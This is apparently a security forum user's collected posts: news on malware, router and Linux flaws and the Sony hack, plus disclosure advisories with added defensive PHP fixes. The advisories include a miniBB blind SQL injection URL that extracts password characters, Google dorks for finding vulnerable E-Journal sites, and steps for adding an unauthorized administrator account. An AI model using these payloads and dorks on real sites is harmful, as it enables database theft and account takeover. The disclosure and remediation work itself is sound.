Everything posted by Aerosol
-
# Exploit Title: miniBB 3.1 Blind SQL Injection
# Date: 23-11-2014
# Software Link: http://www.minibb.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9254
# Category: webapps

1. Description

preg_match() only checks whether $_GET['code'] contains at least one letter or digit (missing ^ and $ inside the regexp).

File: bb_func_unsub.php

```php
$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);
$allowUnsub=FALSE;
$chkCode=FALSE;
if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
    //trying to unsubscribe directly from email
    $chkField='email_code';
    $chkVal=$_GET['code'];
    $userCondition=TRUE;
    $chkCode=TRUE;
}
else{
    //manual unsubscribe
    $chkField='user_id';
    $chkVal=$user_id;
    $userCondition=($usrid==$user_id);
}
if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))
```

http://security.szurek.pl/minibb-31-blind-sql-injection.html

2. Proof of Concept

http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '

This SQL checks whether the first character of the password of user ID=1 is "c". If yes, it sleeps for 5 seconds.

3. Solution:

http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html

Source
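As an added example (not from the advisory and not miniBB's own code), the same check written with and without anchors, followed by the lookup done as a prepared statement; the PDO handle, the 32-character length bound and the table/column names are assumptions.

```php
<?php
// Added example, not miniBB's own code. The check in bb_func_unsub.php accepts any string
// that merely CONTAINS one letter or digit, because "#[a-zA-Z0-9]+#" has no ^ and $ anchors,
// so a real token followed by a quote and SQL passes and reaches db_simpleSelect() unchanged.

// Weak check as shipped in miniBB 3.1: the pattern may match anywhere in the string.
function codeLooksValidWeak(string $code): bool
{
    return preg_match('#[a-zA-Z0-9]+#', $code) === 1;
}

// Hardened check: the WHOLE string must be alphanumeric. The 32-character bound is an
// assumption; use the real width of the email_code column.
function codeLooksValidStrict(string $code): bool
{
    return preg_match('#^[a-zA-Z0-9]{1,32}$#', $code) === 1;
}

// Constructed inputs: a genuine unsubscribe token and a token with SQL appended, in the
// shape of the published PoC. Only the strict check tells the two apart.
$benign   = 'a1b2c3d4e5f6';
$injected = "test' UNION SELECT 1,2 FROM minibbtable_users WHERE username != '";

foreach ([$benign, $injected] as $code) {
    printf("weak=%d strict=%d  %s\n",
        codeLooksValidWeak($code), codeLooksValidStrict($code), $code);
}

// Even with validation in place, the value should never be concatenated into SQL.
// A prepared statement binds it as data; the table name comes from trusted config
// ($Ts in miniBB), never from the request. The PDO connection is assumed, not shown.
function findSubscription(PDO $db, string $table, int $topic, string $code): ?array
{
    if (!codeLooksValidStrict($code)) {
        return null;                       // reject before touching the database
    }
    $stmt = $db->prepare(
        "SELECT id, user_id FROM {$table} WHERE topic_id = :topic AND email_code = :code"
    );
    $stmt->execute([':topic' => $topic, ':code' => $code]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```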
-
Samy Kamkar has a special talent for turning seemingly innocuous things into rather terrifying attack tools. First it was an inexpensive drone that Kamkar turned into a flying hacking platform with his Skyjack research, and now it’s a $20 USB microcontroller that Kamkar has loaded with code that can install a backdoor on a target machine in a few seconds and hand control of it to the attacker. Kamkar has been working on the new project for some time, looking for a way to install the backdoor without needing to use the mouse and keyboard. The solution he came up with is elegant, fast and effective. By using code that can emulate the keyboard and the mouse and evade the security protections such as local firewalls, Kamkar found a method to install his backdoor in just a couple of seconds and keep it hidden on the machine. He loaded the code onto an inexpensive Teensy USB microcontroller. Kamkar said the stickiest problem with the whole thing was figuring out how to move various windows around on the screen without the mouse. “The fun applications are when you can mount an attack pretty simply,” Kamkar said in an interview. “In general, it’s a pretty simple attack. Figuring out how to move things took the most time.” The USBdriveby attack Kamkar devised is somewhat similar to the work done by Karsten Nohl and Jacob Lell on the BadUSB attack. But Kamkar said he had done nearly all of the work on his code before Nohl and Lell disclosed their findings at Black Hat this summer. “Karsten’s attack is much more sophisticated. He’s rewriting the flash memory on the USB,” Kamkar said. “The way he’s adjusting the network preferences is by emulating a network device.” In both cases, the attack takes advantage of the trust that computers have in any USB device that’s inserted. Kamkar’s USBdriveby attack can be executed in a matter of seconds and would be quite difficult for a typical user to detect once it’s executed. 
In a demo video, Kamkar runs the attack on OS X, but he said the code, which he’s released on GitHub, can be modified easily to run on a Windows or Linux machine. The attack inserts a backdoor on the target machine and also overwrites the DNS settings so that the attacker can then spoof various destinations, such as Facebook or an online banking site, and collect usernames and passwords. The backdoor also goes into the cron queue, so that it runs at specified intervals. “In the video, I slow it down quite a bit, but it could be done in a few seconds. The terminal backdoor could be done in a second. You don’t want to send more than sixty characters a second. To an average user, I don’t think they’d find it. You could look in the crontab and find the backdoor. But if someone modifies it, then maybe not,” he said. “A forensics person would find it, but I don’t know if I’d even notice if you did it to my machine.” Kamkar is hopeful that other researchers will look at his code and build on it, looking for other uses for it. “It would be cool if people came up with different attack vectors, maybe have it read an address book or something, especially if they can escalate privileges,” he said. “A lot of people don’t think that it will work if they’re not logged in as an admin. But all I need to do is plant this, and it’s still listening. So if you go in as a normal user and escalate privileges to admin, then I have that.” Source
-
SECURITY RESEARCHERS are making use of quantum physics to create fraud-proof credit cards. Called Quantum-Secure Authentication (QSA), the technology means hackers cannot determine what the information is. It centres on single particles of light, or photons, and their ability to encode data and exploits a property of photons that allows them to effectively be in multiple places at once, a phenomenon described in quantum physics. "We experimentally demonstrate quantum-secure authentication (QSA) of a classical multiple-scattering key. The key is authenticated by illuminating it with a light pulse containing fewer photons than spatial degrees of freedom and verifying the spatial shape of the reflected light," explained the researchers in an Optica journal. Quantum-physical principles forbid an attacker from being able to discern the incident light pulse so that they cannot emulate the key by digitally constructing the expected optical response, even if all information about the key is publicly known. The researchers explained that QSA uses a key that cannot be copied due to "technological limitations" and is also secure against digital emulation. It also does not depend on secrecy of stored data, nor upon unproven mathematical assumptions, being relatively simple to implement with current technology, the security experts claimed. Malwarebytes's head of malware intelligence, Adam Kujawa, said that while the database could be hacked and the pairs could be stolen, the keys would not be in a form that could be digitally reproduced and therefore would be virtually useless to the attacker. "The problem is that even if the attacker were to obtain a correct challenge response, for a single challenge, it would be impossible for them to recreate that response in a way that would authenticate due to the properties of Quantum Physics," Kujawa said. "In addition, they would need to know that the challenge response would be used again in a lock that has dynamically generated keyholes."
Kujawa explained that the amount of effort required to ensure that any key would make it through authentication for a single QSA would require numerous tries and having access to both the client and server; something like that would throw flags faster than a working key could be calculated. "Authentication at that point would be impossible," he added, suggesting that this technology could mean a future of truly secure data. Source
-
The latest evolution of the online bank account raiding Trojan ZeuS is the webcam-spying Chthonic malware, according to researchers. Chthonic infects Windows PCs, and allows criminals to connect to the compromised PC remotely and command it to carry out fraudulent transactions. The software nasty is targeting customers of more than 150 banks and 20 payment systems in 15 countries. Financial institutions in the UK, Spain, the US, Russia, Japan and Italy are among the most heavily targeted banks. Security researchers at Kaspersky Lab say the theftware is an evolution of ZeuS. Chthonic’s main weapon is web injectors: it inserts its own malicious JavaScript code and images into an online bank's pages when fetched by the web browser on an owned Windows PC. These modifications intercept the victim’s phone number, one-time passwords and PINs, and any other sensitive information typed in by the user, and send it off to fraudsters. In the case of one of the Japanese banks targeted, Chthonic was able to hide the bank’s warnings about malware, and instead inject a script that allows attackers to carry out various transactions using the victim’s account. Elsewhere, affected customers of Russian banks are greeted by a completely fraudulent banking site as soon as they enter their login details. The trojan creates an iFrame with a counterfeit copy of the website that has the same size as the original window. Fortunately, many code fragments used by Chthonic to perform web injections can no longer be used, because banks have changed the structure of their pages and in some cases, the domains as well. Victims are infected through web links or by email attachments carrying a booby-trapped document that exploits a bug in Microsoft's Word software to execute malicious code. “The attachment contains a specially crafted RTF document, designed to exploit the CVE-2014-1761 vulnerability in Microsoft Office products,” Kaspersky Lab explains.
Once downloaded and running, the malicious code, which contains an encrypted configuration file, injects itself into a msiexec process, and a number of malicious modules are unpacked and installed on the machine. Analysis is ongoing, but so far Kaspersky Lab researchers have discovered modules that can collect system information, steal saved passwords, log keystrokes, enable remote access, and record video and sound through any installed web camera and microphone. “The discovery of Chthonic confirms that the ZeuS Trojan is still actively evolving,” said Yury Namestnikov, senior malware analyst at Kaspersky Lab and one of the researchers who investigated the threat. “Malware writers are making full use of the latest techniques, helped considerably by the leak of the ZeuS source code.” “Chthonic is the next phase in the evolution of ZeuS. It uses Zeus AES encryption, a virtual machine similar to that used by ZeusVM and KINS, and the Andromeda downloader – to target ever more financial institutions and innocent customers in ever more sophisticated ways,” he added. Namestnikov warned that more new variants of ZeuS are likely. More technical details on Chthonic can be found in a post on Kaspersky’s official Securelist blog here. Source
-
A dispute has arisen about the seriousness of a vulnerability in Linux, dubbed "Grinch", that supposedly creates a privilege escalation risk. The flaw resides in the Linux authorisation system, which can unintentionally allow privilege escalation, granting a user “root", or full administrative, access. “With full root access, an attacker would be able to completely control a system, including the ability to install programs, read data, and use the machine as a launching point for compromising other systems,” Alert Logic warns. Alert Logic warns that the “grinch” [1] bug impacts all Linux platforms, including mobile devices. Alert Logic admits it has NOT seen any exploits that harness this vulnerability. Other security firms believe Alert Logic is overstating the risk, which Trend Micro characterises as “limited”. The scope of this vulnerability is very limited. Grinch is not remotely exploitable; it requires that an attacker have physical access to the server they want to attack. In addition, the attacker must already have access to an account in the wheel group (i.e., already have elevated privileges as local administrators), polkit [toolkit for privilege authorisation] must be installed, and the PackageKit package management system must be in use. The barriers to exploitation are significant; in a very real way, to exploit this flaw you must already have very high levels of access, making exploiting this “vulnerability” unnecessary. SANS describes it as more a “common overly permissive configuration of many Linux systems”. Red Hat dismisses the flaw entirely as “expected behavior“. An independent researcher first posted about the vulnerability – which he called PackageKit Privilege Escalation – almost a month ago before Alert Logic picked up on the threat and publicised it.

Bootnote
[1] The bug was named after the famous Dr Seuss character, since it supposedly carries the potential to ruin the season of network administrators.

Source
-
US software giant Microsoft is suing alleged scammers who phone people pretending to represent the firm and offer bogus technology support. The callers ask to take over a home computer and demand money to fix it. Some then install viruses as well. The software company said it had received more than 65,000 complaints about tech support scams since May. It is taking legal action against several firms it accuses of misusing its name in such cases.

Fake ads

The scam has been around for decades with callers peddling useless security software and tricking people into spending hundreds of pounds (or dollars) to solve non-existent computer problems. Increasingly, the bogus technicians are gaining access to people's computers remotely. From there they can also steal personal and financial information and install malware. In some cases people are tricked into signing up for support via fake web ads. Others receive a direct telephone call from a technician claiming to represent Microsoft. Microsoft has warned that scammers are likely to be active over the Christmas period. "The holiday season is a popular time for scammers as more people engage in online activities, including shopping, donating to charity and searching for travel deals," it said.

Older victims

Older people needed to be particularly vigilant, it said. "Tech support scammers don't discriminate; they will go after anyone, but not surprisingly senior citizens have been among the most vulnerable." The US Federal Trade Commission filed a legal case in Florida last month against a company that used adverts to scare people into believing their computer had a virus and then sell them allegedly worthless services. In the UK Trading Standards has recently taken legal action against a man from Luton who hired people at an Indian call centre to falsely tell people their computers had a serious problem.
Mohammed Khalid Jamil was given a four-month suspended jail sentence and ordered to pay £5,665 compensation and £13,929 in prosecution costs. Microsoft has issued tips to help users avoid falling for such scams. It says:

- Ask if there is a fee or subscription for the services. If there is, hang up.
- Never give control of your computer to the third party unless you can confirm it is a legitimate representative of a computer support team at a company of which you are already a customer.
- Take the caller's information down and immediately report it to your local authorities.
- Never provide your credit card or financial information to someone claiming to be from Microsoft tech support.

Source
-
There are probably some from RO as well... the purpose? See what others are doing.
-
The United States government is expected to attribute the damaging and embarrassing hack of Sony Pictures Entertainment to the government of North Korea. Various mainstream media outlets quoting anonymous government sources said North Korea is “centrally involved” in the attack, which NBC News said was carried out by hackers outside the isolated country on the orders of the North Korean government. It’s unknown what evidence the U.S. government has linking the Sony hack to North Korea, nor how said evidence was obtained. It’s likely the U.S. won’t give much in the way of details in this regard without sharing insight into what are likely classified activities, security experts said. Another big unknown is how the U.S. will respond against a nation already under heavy economic sanctions. The Washington Post reports the White House has not determined a course of action, which will delay a public announcement. The public narrative in terms of motivation has been the Sony-produced comedy movie The Interview which depicts a plot to assassinate North Korean leader Kim Jong Un. A North Korean spokesman called the movie a “blatant act of terrorism and war,” leading to initial speculation the country was behind the attack on Sony, which yesterday canceled the movie’s scheduled Christmas Day release. Sony’s announcement came after leading theater chains said they would not run the movie after threats from the Guardians of Peace hacker group claiming responsibility for the hacks, which said that it would generate a 9/11-style response against the premiere and theaters showing the movie. The movie, however, could be a massive red herring. The attackers not only allegedly made off with terabytes of data that included private emails from top executives and celebrities, but also intellectual property ranging from unreleased movies made available for download, to scripts of upcoming potential blockbusters put online, in addition to employees’ personal information. 
They also covered their tracks by unleashing wiper malware that overwrote hard drives company-wide, malware that was also used in the DarkSeoul attacks in South Korea that were attributed to the North, as well as the Saudi Aramco Shamoon attacks attributed to Iran. Could this just be a rogue country demonstrating its capabilities and proving that it can operate on a somewhat level playing field with a world power? “It’s not about a movie or even Sony, at all,” wrote Immunity CEO and former NSA scientist Dave Aitel on the Daily Dave mailing list. “When you build a nuclear program, you have to explode at least one warhead so that other countries see that you can do it. The same is true with Cyber.” Aitel was one of the first to publicly theorize that North Korea was behind the Sony hack and likened it to Iran’s alleged involvement in the Shamoon attacks that destroyed 30,000 workstations at the Saudi state-run oil manufacturer. “Iran did this exact same near-mortal blow to Saudi Aramco, as a way of demonstrating that they could and would,” Aitel said. “That’s what just happened to Sony, but they didn’t see it in time, and didn’t realize they were going to have to fold. If you recognize the signature of this kind of nation-state attack, it is not hard to see ahead of time what is going to happen. “Clearly, not all hacking (even very impactful hacking) by random hacker groups is war/terrorism,” Aitel continued. “But when a nation state decides to take out a business in another country, it’s hard for our policy team to find another word for it.” While attribution is difficult in any hack, analysis of the Destover wiper malware has been conclusive in linking it to the three most public, destructive attacks on record. Kaspersky Lab senior researcher Kurt Baumgartner published a report on Dec. 4 analyzing the similarities in the Shamoon, DarkSeoul and Sony hacks.
Across the three attacks, Baumgartner notes the use of commercially available Eldos RawDisk driver files (Shamoon and Destover), that wiper drivers are maintained in the dropper’s resource section (Shamoon, Destover), and disk data and the master boot record are overwritten with encoded political messages (Shamoon, DarkSeoul). “In all three cases: Shamoon, DarkSeoul and Destover, the groups claiming credit for their destructive impact across entire large networks had no history or real identity of their own,” Baumgartner wrote in a report published on Securelist. “All attempted to disappear following their act, did not make clear statements but did make bizarre and roundabout accusations of criminal conduct, and instigated their destructive acts immediately after a politically-charged event that was suggested as having been at the heart of the matter.” Cisco’s Talos research team published its own report yesterday, warning future victims that backup is an essential protective measure in such attacks. The Talos report dives into the technical aspects of wiper malware and how to detect it. Source
-
More than 12 million devices running an embedded webserver called RomPager are vulnerable to a simple attack that could give a hacker man-in-the-middle position on traffic going to and from home routers from just about every leading manufacturer. Mostly ISP-owned residential gateways manufactured by D-Link, Huawei, TP-Link, ZTE, Zyxel and several others are currently exposed. Researchers at Check Point Software Technologies reported the flaw they’ve called Misfortune Cookie, to all of the affected vendors and manufacturers, and most have responded that they will push new firmware and patches in short order. The problem with embedded device security is that, with consumer-owned gear especially, it’s up to the device owner to find and flash new firmware, leaving most of the devices in question vulnerable indefinitely. In the case of the RomPager vulnerability, an attacker need only send a single packet containing a malicious HTTP cookie to exploit the flaw. Such an exploit would corrupt memory on the device and allow an attacker to remotely gain administrative access to the device. “We hope this is a game-changing wake-up call,” said Shahar Tal, malware and vulnerability research manager with Check Point. “Certainly in terms of numbers, I don’t remember a vulnerability released that had 12 million endpoints online since maybe Conficker in 2008. This is really, really bad and the incredibly slow update propagation chain makes it worse.” Tal said the vulnerable code was written in 2002 and given to chipset makers bundled in a software development kit (SDK). This SDK was given to manufacturers who used it when building their respective firmware; ISPs, Tal said, also used the same SDK to prepare custom firmware used in consumer residential devices. “The vulnerable code is from 2002 and was actually fixed in 2005 [by AllegroSoft, makers of RomPager] and yet still did not make it into consumer devices,” Tal said. 
“It’s present in device firmware manufactured in 2014 that we downloaded last month. This is an industry problem; something is wrong.” Tal said Check Point conducted Internet scans that show the 12 million devices exposed online in 189 countries. In some of those countries, Tal said, vulnerability rates hover around 10 percent, and in one country half of its Internet users are at risk. “Even when people become aware of this, I don’t expect updated firmware to be deployed in 189 countries,” Tal said. “This will be with us for months and years to come.” That means that vulnerable home routers are at risk to remote attacks that put not only Internet traffic at risk, but also other devices on a local network such as printers. “The implications of these risks mean more than just a privacy violation – they also set the stage for further attacks, such as installing malware on devices and making permanent configuration changes,” Check Point wrote in an analysis published today. “This WAN-to-LAN free-crossing is also bypassing any firewall or isolation functionality previously provided by your gateway and breaks common threat models. For example, an attacker can try to access your home webcam (potentially using default credentials) or extract data from your business NAS backup drive.” Tal said Check Point is not aware of any exploits of this issue, but assumes that researchers and black hats will soon begin pinging Shodan and doing Google searches looking for vulnerable devices. “This is very easy to exploit once you figure out the program internals,” Tal said. “We are assuming that some researchers will do that in upcoming days and we hope vendors react as fast as possible to get consumers protected.” Some vendors, which Tal would not name, have already shared beta versions of upgraded firmware with Check Point, and Check Point has confirmed the issue as patched in those cases. 
“Everyone is aware that embedded devices are insecure, but we haven’t had one game-changing event that crosses boundaries and makes the industry understand this,” Tal said. “This one is definitely worth the attention and needs fixing.” Source
-
Document Title:
===============
E-Journal CMS (ID) - Multiple Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1380

Release Date:
=============
2014-12-17

Vulnerability Laboratory ID (VL-ID):
====================================
1380

Common Vulnerability Scoring System:
====================================
7

Product & Service Introduction:
===============================
http://simlitabmas.dikti.go.id/ejournal/

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered multiple vulnerabilities in the Indonesian E-Journal web application.

Vulnerability Disclosure Timeline:
==================================
2013-12-17: Public Disclosure

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
1.1
A SQL injection web vulnerability has been discovered in the official E-Journal (ID) content management system. The vulnerability allows remote attackers to execute their own SQL commands by usage of a vulnerable service value.

The vulnerability is located in the id value of the jurnal.php file. Remote attackers are able to execute their own SQL commands by usage of a GET method request with a manipulated id value. Remote attackers are able to read database information by execution of their own SQL commands. The vulnerability is located on the client side and the request method to execute SQL commands is GET.

The security risk of the SQL vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 7.0. Exploitation of the SQL injection web vulnerability does not require a privileged application user account or user interaction. Successful exploitation of the remote vulnerability results in database management system and web application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] jurnal

Vulnerable File(s):
[+] jurnal.php

Vulnerable Parameter(s):
[+] id

1.2
A privilege escalation vulnerability has been discovered in the official E-Journal (ID) content management system. The vulnerability allows an attacker to escalate restricted privileges, for example to gain higher access controls.

The privilege escalation vulnerability is located in the tambah value of the URL input in the data.php file. Remote attackers can switch the menu to escalate privileges by adding a new administrator account. The vulnerability is located on the application side and the request method to inject is POST.

The security risk of the privilege escalation vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.9. Exploitation of the privilege escalation web vulnerability requires a low privileged application user account and no user interaction. Successful exploitation of the remote vulnerability results in information leaking, database management system and web application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] URL

Vulnerable File(s):
[+] data.php

Vulnerable Parameter(s):
[+] tambah

Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers without a privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Dork(s):
inurl:mahasiswa.php intitle:E-Journal
inurl:dosen.php intitle:E-Journal
inurl:jurnal.php intitle:E-Journal
inurl:dokumen.php intitle:E-Journal
"Karya Tulis Mahasiswa" intitle:E-Journal
"Design & Programming by" intitle:E-Journal
"E-Journal adalah aplikasi berbasis web untuk"
Or use your own Google Dorks

Note: This E-Journal CMS has 2 versions. The old version doesn't have informasi.php (Informasi Menu).

1.1 PoC#1: SQL Injection
http://[Site]/[Path]/jurnal.php?detail=jurnal&id=-'[SQL-INJECTION VULNERABILITY]--

Reference Url(s):
http://e-journal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]--
http://www.ejournal-xxx.com/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]--
http://ejurnal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]--
http://ejournal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]--

1.2 PoC#2: Privilege Escalation
You can create a new administrator account by usage of the following trick. For example, my target URL is: http://www.ejournal-xxx.com/

Step 1: Add data.php?tambah=dosen to the URL. So in this case the URL was http://www.ejournal-xxx.com/data.php?tambah=dosen
Step 2: Then you can see this notice: "ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR". Ignore that notice and click Admin Menu.
Screenshot #1: http://i59.tinypic.com/54he2b.png
Step 3: Successfully exploited! Now you can add an Administrator Account.
Screenshot #2: http://i59.tinypic.com/2i8vyus.png

Solution - Fix & Patch:
=======================
1.1
The vulnerability can be patched by usage of a prepared statement. Encode and parse the vulnerable id value in the jurnal.php file to prevent SQL injection attacks.

1.2
Restrict the URL parameter input to prevent unauthorized account adds. Parse the URL value, encode the input and restrict the URL to a local source.

Security Risk:
==============
1.1
The security risk of the remote SQL injection web vulnerability in the E-Journal application is estimated as high. (CVSS 7.0)

1.2
The security risk of the privilege escalation web vulnerability in the URL parameter is estimated as high. (CVSS 6.9)

Credits & Authors:
==================
X-Cisadane - Stefanus (steevee.aka@gmail.com)
Greetz to: X-Code YogyaFree, Explore Crew, CodeNesia, Bogor Hackers Community, Tomi Zaoldyeck and Winda Utari

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get permission.

Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Source
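Added example (not the E-Journal CMS's own code) of the server-side gate the privilege-escalation fix in the advisory above calls for: the PoC works because data.php prints an access-denied notice and then still renders the admin menu, so the decision has to be made before anything privileged is rendered and a denial has to stop execution. The session keys, the role name and the list of sections are assumptions.

```php
<?php
// Added example, not the E-Journal CMS's own code. The advisory describes data.php?tambah=...
// printing "ANDA TIDAK BERHAK MENGAKSES HALAMAN INI..." and then still rendering the admin
// menu that adds accounts. A notice that does not stop execution is not an access control.
// $_SESSION['user_id'], $_SESSION['role'], the role name and the section list are assumptions.

session_start();

// Sections data.php may add records for; anything else is rejected outright, which also
// covers the advisory's advice to restrict what the tambah parameter may select.
const ALLOWED_SECTIONS = ['dosen', 'mahasiswa', 'jurnal'];

// Pure decision function: true only for a logged-in administrator and a known section.
// Taking the session as a parameter keeps it testable without a web server.
function mayAddRecord(array $session, string $section): bool
{
    if (!in_array($section, ALLOWED_SECTIONS, true)) {
        return false;
    }
    return !empty($session['user_id'])
        && ($session['role'] ?? '') === 'administrator';
}

// Builds the add form; every client-supplied value is escaped before it goes into HTML.
function renderAddForm(string $section): string
{
    $safeSection = htmlspecialchars($section, ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="data.php?tambah=' . $safeSection . '">'
         . '<input name="username"><input type="password" name="password">'
         . '<button>Tambah</button></form>';
}

$section = (string)($_GET['tambah'] ?? '');

if (!mayAddRecord($_SESSION, $section)) {
    http_response_code(403);
    // Same message the vulnerable page showed, but here nothing runs after it.
    exit('ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR');
}

// Only an authenticated administrator reaches this point, for GET and POST alike.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Insert the new record for $section here, using a prepared statement as the
    // advisory's fix for 1.1 recommends (database code omitted; connection is assumed).
}

echo renderAddForm($section);
```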
-
WordPress iTwitter 0.04 Cross Site Request Forgery / Cross Site Scripting
WordPress PictoBrowser 0.3.1 CSRF / XSS
WordPress Twitter 0.7 CSRF / XSS
WordPress PWG Random 1.11 CSRF / XSS
WordPress gSlideShow 0.1 CSRF / XSS
WordPress SimpleFlickr 3.0.3 CSRF / XSS
WordPress twimp-wp Cross Site Request Forgery / Cross Site Scripting
WordPress Simplelife 1.2 CSRF / XSS
WordPress Twitter LiveBlog 1.1.2 CSRF / XSS
WordPress TweetScribe 1.1 CSRF / XSS
WordPress WP Limit Posts Automatically 0.7 CSRF / XSS
WordPress WP Unique Article Header Image 1.0 CSRF / XSS
-
Document Title:
===============
Facebook Bug Bounty #16 (Studio) - Persistent Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1368

Facebook Security ID: 219162244

Release Date:
=============
2014-12-10

Vulnerability Laboratory ID (VL-ID):
====================================
1368

Common Vulnerability Scoring System:
====================================
3.5

Product & Service Introduction:
===============================
Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website's membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as 'People From Work' or 'Close Friends'. As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site's terms of service. In May 2005, Accel Partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade 'best-of' list, saying, 'How on earth did we stalk our exes, remember our co-workers' birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?' Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 billion, Facebook joined the Fortune 500 list for the first time, being placed at position 462 on the list published in 2013.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook )

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered a persistent input validation web vulnerability in the official Facebook Studio web application.

Vulnerability Disclosure Timeline:
==================================
2014-12-10: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Facebook
Product: Studio Service - Web Application 2014 Q4

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Facebook Studio online service web application. The vulnerability allows remote attackers to inject malicious script code on the application side and so compromise the online service.

The vulnerability is located in the dashboard module of the Facebook Studio service. A remote attacker stores the script code through the Facebook mobile client (the profile "website" field); once the payload is stored, opening the Studio dashboard executes it. The issue was found while testing how input entered in the Facebook mobile client is HTML-encoded before it reaches the Facebook Studio service. The attack vector is persistent and the request method used for the injection is POST.

The security risk of the persistent vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.5. Exploitation requires a low-privileged web-application user account and medium user interaction. Successful exploitation results in persistent phishing attacks, persistent session hijacking attacks, persistent external redirects to malicious sources and application-side manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s): Input
[+] https://m.facebook.com/editprofile.php?type=contact&edit=website&refid=17

Affected Module(s): Output
[+] https://www.facebook-studio.com/dashboard#_=_

Proof of Concept (PoC):
=======================
The bug is a first-order injection in Facebook mobile (m.facebook.com, tested with Firefox): the value is stored unencoded and later rendered in Facebook Studio, where it fires as stored XSS.

Manual steps to reproduce the vulnerability ...

